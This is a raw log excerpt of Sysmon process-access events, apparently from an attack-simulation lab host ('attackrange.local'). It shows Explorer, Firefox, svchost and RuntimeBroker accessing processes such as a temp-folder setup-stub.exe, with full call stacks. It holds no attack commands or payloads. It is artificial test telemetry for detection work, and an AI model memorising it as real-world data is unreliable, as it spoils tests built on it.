ystem32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c541|C:\Program Files\Mozilla Firefox\xul.dll+1722fb0|C:\Program Files\Mozilla Firefox\xul.dll+17212f6|C:\Program Files\Mozilla Firefox\xul.dll+17211bf|C:\Program Files\Mozilla Firefox\xul.dll+1722742|C:\Program Files\Mozilla 
Firefox\xul.dll+2df7bc2|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90 10341000x800000000000000016714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.692{59A5CD1D-93F9-6005-F104-00000000A301}45406928C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000016705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.692{59A5CD1D-93F9-6005-F104-00000000A301}45406928C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000016704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.692{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000016703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 